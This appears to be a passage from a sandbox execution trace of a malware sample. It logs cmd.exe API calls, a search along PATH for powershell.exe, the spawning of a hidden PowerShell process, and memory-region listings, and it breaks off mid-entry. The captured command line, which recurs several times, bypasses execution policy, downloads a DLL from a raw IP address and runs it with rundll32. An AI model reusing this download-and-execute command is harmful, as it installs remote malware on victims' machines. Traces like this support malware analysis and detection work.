_wcsicmp (_String1="FOR", _String2="powershell.exe") returned -10 [0020.729] _wcsicmp (_String1="FOR/?", _String2="powershell.exe") returned -10 [0020.729] _wcsicmp (_String1="IF", _String2="powershell.exe") returned -7 [0020.729] _wcsicmp (_String1="IF/?", _String2="powershell.exe") returned -7 [0020.729] _wcsicmp (_String1="REM", _String2="powershell.exe") returned 2 [0020.729] _wcsicmp (_String1="REM/?", _String2="powershell.exe") returned 2 [0020.733] GetConsoleTitleW (in: lpConsoleTitle=0x2cf3e0, nSize=0x104 | out: lpConsoleTitle="c:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.734] GetFileAttributesW (lpFileName="powershell.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop\\powershell.exe")) returned 0xffffffff [0020.734] _wcsicmp (_String1="powershell", _String2="DIR") returned 12 [0020.734] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11 [0020.734] _wcsicmp (_String1="powershell", _String2="DEL") returned 12 [0020.734] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4 [0020.734] _wcsicmp (_String1="powershell", _String2="COPY") returned 13 [0020.734] _wcsicmp (_String1="powershell", _String2="CD") returned 13 [0020.734] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13 [0020.734] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2 [0020.734] _wcsicmp (_String1="powershell", _String2="REN") returned -2 [0020.734] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11 [0020.734] _wcsicmp (_String1="powershell", _String2="SET") returned -3 [0020.734] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14 [0020.734] _wcsicmp (_String1="powershell", _String2="DATE") returned 12 [0020.734] _wcsicmp (_String1="powershell", _String2="TIME") returned -4 [0020.734] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3 [0020.734] _wcsicmp (_String1="powershell", _String2="MD") returned 3 [0020.734] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3 [0020.734] _wcsicmp (_String1="powershell", _String2="RD") returned -2 [0020.734] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2 [0020.734] _wcsicmp (_String1="powershell", _String2="PATH") returned 14 [0020.734] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9 [0020.734] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3 [0020.734] _wcsicmp (_String1="powershell", _String2="CLS") returned 13 [0020.734] _wcsicmp (_String1="powershell", _String2="CALL") returned 13 [0020.734] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6 [0020.734] _wcsicmp (_String1="powershell", _String2="VER") returned -6 [0020.734] _wcsicmp (_String1="powershell", _String2="VOL") returned -6 [0020.734] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11 [0020.734] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3 [0020.734] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11 [0020.734] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4 [0020.735] _wcsicmp (_String1="powershell", _String2="START") returned -3 [0020.735] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12 [0020.735] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5 [0020.735] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3 [0020.735] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6 [0020.735] _wcsicmp (_String1="powershell", _String2="POPD") returned 7 [0020.735] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15 [0020.735] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10 [0020.735] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14 [0020.735] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13 [0020.735] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3 [0020.735] _wcsicmp (_String1="powershell", _String2="DIR") returned 12 [0020.735] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11 [0020.735] _wcsicmp (_String1="powershell", _String2="DEL") returned 12 [0020.735] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4 [0020.735] _wcsicmp (_String1="powershell", _String2="COPY") returned 13 [0020.735] _wcsicmp (_String1="powershell", _String2="CD") returned 13 [0020.735] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13 [0020.735] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2 [0020.735] _wcsicmp (_String1="powershell", _String2="REN") returned -2 [0020.735] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11 [0020.735] _wcsicmp (_String1="powershell", _String2="SET") returned -3 [0020.735] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14 [0020.735] _wcsicmp (_String1="powershell", _String2="DATE") returned 12 [0020.735] _wcsicmp (_String1="powershell", _String2="TIME") returned -4 [0020.735] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3 [0020.735] _wcsicmp (_String1="powershell", _String2="MD") returned 3 [0020.735] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3 [0020.735] _wcsicmp (_String1="powershell", _String2="RD") returned -2 [0020.735] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2 [0020.735] _wcsicmp (_String1="powershell", _String2="PATH") returned 14 [0020.735] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9 [0020.735] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3 [0020.735] _wcsicmp (_String1="powershell", _String2="CLS") returned 13 [0020.735] _wcsicmp (_String1="powershell", _String2="CALL") returned 13 [0020.735] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6 [0020.735] _wcsicmp (_String1="powershell", _String2="VER") returned -6 [0020.735] _wcsicmp (_String1="powershell", _String2="VOL") returned -6 [0020.735] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11 [0020.735] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3 [0020.735] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11 [0020.735] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4 [0020.735] _wcsicmp (_String1="powershell", _String2="START") returned -3 [0020.735] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12 [0020.735] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5 [0020.736] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3 [0020.736] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6 [0020.736] _wcsicmp (_String1="powershell", _String2="POPD") returned 7 [0020.736] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15 [0020.736] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10 [0020.736] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14 [0020.736] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13 [0020.736] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3 [0020.736] _wcsicmp (_String1="powershell", _String2="FOR") returned 10 [0020.736] _wcsicmp (_String1="powershell", _String2="IF") returned 7 [0020.736] _wcsicmp (_String1="powershell", _String2="REM") returned -2 [0020.736] _wcsnicmp (_String1="powe", _String2="cmd ", _MaxCount=0x4) returned 13 [0020.737] SetErrorMode (uMode=0x0) returned 0x8001 [0020.737] SetErrorMode (uMode=0x1) returned 0x0 [0020.737] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4222a0, lpFilePart=0x2cef00 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x2cef00*="Desktop") returned 0x20 [0020.737] SetErrorMode (uMode=0x8001) returned 0x1 [0020.737] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0020.737] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0020.740] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0020.742] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.742] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\powershell.exe", fInfoLevelId=0x1, lpFindFileData=0x2cec9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec9c) returned 0xffffffff [0020.743] GetLastError () returned 0x2 [0020.743] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\powershell.exe.*", fInfoLevelId=0x1, lpFindFileData=0x2cec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec7c) returned 0xffffffff [0020.743] GetLastError () returned 0x2 [0020.743] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\powershell.exe", fInfoLevelId=0x1, lpFindFileData=0x2cec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec7c) returned 0xffffffff [0020.743] GetLastError () returned 0x2 [0020.743] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.743] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe", fInfoLevelId=0x1, lpFindFileData=0x2cec9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec9c) returned 0xffffffff [0020.743] GetLastError () returned 0x2 [0020.743] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.*", fInfoLevelId=0x1, lpFindFileData=0x2cec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec7c) returned 0xffffffff [0020.743] GetLastError () returned 0x2 [0020.743] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe", fInfoLevelId=0x1, lpFindFileData=0x2cec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec7c) returned 0xffffffff [0020.743] GetLastError () returned 0x2 [0020.743] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.743] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell.exe", fInfoLevelId=0x1, lpFindFileData=0x2cec9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec9c) returned 0xffffffff [0020.744] GetLastError () returned 0x2 [0020.744] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell.exe.*", fInfoLevelId=0x1, lpFindFileData=0x2cec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec7c) returned 0xffffffff [0020.744] GetLastError () returned 0x2 [0020.744] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell.exe", fInfoLevelId=0x1, lpFindFileData=0x2cec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec7c) returned 0xffffffff [0020.744] GetLastError () returned 0x2 [0020.744] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.744] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe", fInfoLevelId=0x1, lpFindFileData=0x2cec9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec9c) returned 0xffffffff [0020.746] GetLastError () returned 0x2 [0020.746] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.*", fInfoLevelId=0x1, lpFindFileData=0x2cec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec7c) returned 0xffffffff [0020.747] GetLastError () returned 0x2 [0020.747] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe", fInfoLevelId=0x1, lpFindFileData=0x2cec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec7c) returned 0xffffffff [0020.747] GetLastError () returned 0x2 [0020.747] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.747] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", fInfoLevelId=0x1, lpFindFileData=0x2cec9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec9c) returned 0x410f60 [0020.747] FindClose (in: hFindFile=0x410f60 | out: hFindFile=0x410f60) returned 1 [0020.748] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0020.748] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0020.748] GetConsoleTitleW (in: lpConsoleTitle=0x2cf174, nSize=0x104 | out: lpConsoleTitle="c:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.748] GetConsoleTitleW (in: lpConsoleTitle=0x4224b0, nSize=0x104 | out: lpConsoleTitle="c:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.748] SetConsoleTitleW (lpConsoleTitle="c:\\Windows\\System32\\cmd.exe - powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll');rundll32.exe 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll' HOK ") returned 1 [0020.749] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ceffc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf0c4 | out: lpAttributeList=0x2ceffc, lpSize=0x2cf0c4) returned 1 [0020.749] UpdateProcThreadAttribute (in: lpAttributeList=0x2ceffc, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf0bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ceffc, lpPreviousValue=0x0) returned 1 [0020.749] GetStartupInfoW (in: lpStartupInfo=0x2cefb8 | out: lpStartupInfo=0x2cefb8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="c:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x41, wShowWindow=0x7, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x400000, hStdOutput=0x422f78, hStdError=0x2cf0e8)) [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0020.749] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0020.750] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0020.750] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0020.750] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0020.750] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0020.750] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0020.750] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0020.750] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0020.750] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0020.750] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0020.750] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0020.750] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1 [0020.752] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll');rundll32.exe 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll' HOK ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpStartupInfo=0x2cf058*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll');rundll32.exe 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll' HOK ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf0a4 | out: lpCommandLine="powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll');rundll32.exe 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll' HOK ", lpProcessInformation=0x2cf0a4*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa50, dwThreadId=0xa54)) returned 1 [0020.765] CloseHandle (hObject=0x4c) returned 1 [0020.765] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0020.765] GetEnvironmentStringsW () returned 0x420360* [0020.765] FreeEnvironmentStringsW (penv=0x420360) returned 1 [0020.765] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) Process: id = "3" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x7eef7680" os_pid = "0xa50" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa38" cmd_line = "powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll');rundll32.exe 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll' HOK " cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 440 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 441 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 442 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 443 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 444 start_va = 0x22250000 end_va = 0x222c1fff entry_point = 0x22250000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 445 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 446 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 447 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 448 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 449 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 450 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 451 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 452 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 453 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 454 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 455 start_va = 0x6bb30000 end_va = 0x6bb79fff entry_point = 0x6bb32e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 456 start_va = 0x741c0000 end_va = 0x741d3fff entry_point = 0x741c0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 457 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 458 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 459 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 460 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 461 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 462 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 463 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 464 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 465 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 466 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 467 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 468 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 469 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 470 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 471 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 472 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 473 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 474 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 475 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 476 start_va = 0xe0000 end_va = 0xe2fff entry_point = 0xe0000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 477 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 478 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 479 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 480 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 481 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 482 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 483 start_va = 0x75340000 end_va = 